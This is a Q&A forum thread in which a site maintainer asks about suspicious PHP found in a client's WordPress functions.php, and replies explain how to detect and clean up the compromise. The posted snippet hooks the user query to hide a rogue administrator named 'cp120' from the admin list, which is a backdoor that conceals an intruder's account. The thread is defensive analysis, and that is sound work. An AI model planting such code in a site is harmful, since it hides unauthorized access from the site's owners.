-1

I have a client that said they think there site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel its not right?

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') { 
 global $wpdb;
 $user_search->query_where = str_replace('WHERE 1=1',
   "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
  }
}
Dave C
  • 262
  • 2
  • 6
  • 25
  • Hide one admin from another admin: http://wordpress.stackexchange.com/questions/47743/hide-one-admin-from-another-admin – JimL Jul 24 '13 at 21:41
  • That explains it. When you were logged into the site as admin it said there were to admins but only showed one, I wonder how I will make sure this guys is out for good....back doors no doubt. – Dave C Jul 24 '13 at 21:48
  • If I create a new admin and check that file it immediately puts that code in there again for the new admin username, any idea how that is happening? – Dave C Jul 24 '13 at 21:56
  • Either a hacked admin register/promote function or a shell script. Guessing the first one. I'd do a reinstall. Remove everything (except db) and get a fresh copy of WP. Then check each plugin/extension for known exploits before reinstalling them. Remember to backup files and db, in case something goes wrong and/or you wish to investigate the hack further – JimL Jul 24 '13 at 22:01

1 Answers1

1

This code, or similar markup is sometimes used by Wordpress hackers. Once they gain access to your Wordpress admin via malicious methods they create a legitimate admin user and then put this code in your functions.php file so that when you go to your admin user section it only displays 1 user. Here is the trick to see if this has happened to you incase you are unfamiliar with php pr don't want to look through a long functions.php file. Go to your admin user area and it will only display the admin users that you know of however the number next to admin users will not match the number of displayed users. it will say (4) but only show 3 names.

As a note this code can be used for legitimate reasons so make sure if you find this that it wasn't done by your site's admin or developer.

Dave C
  • 262
  • 2
  • 6
  • 25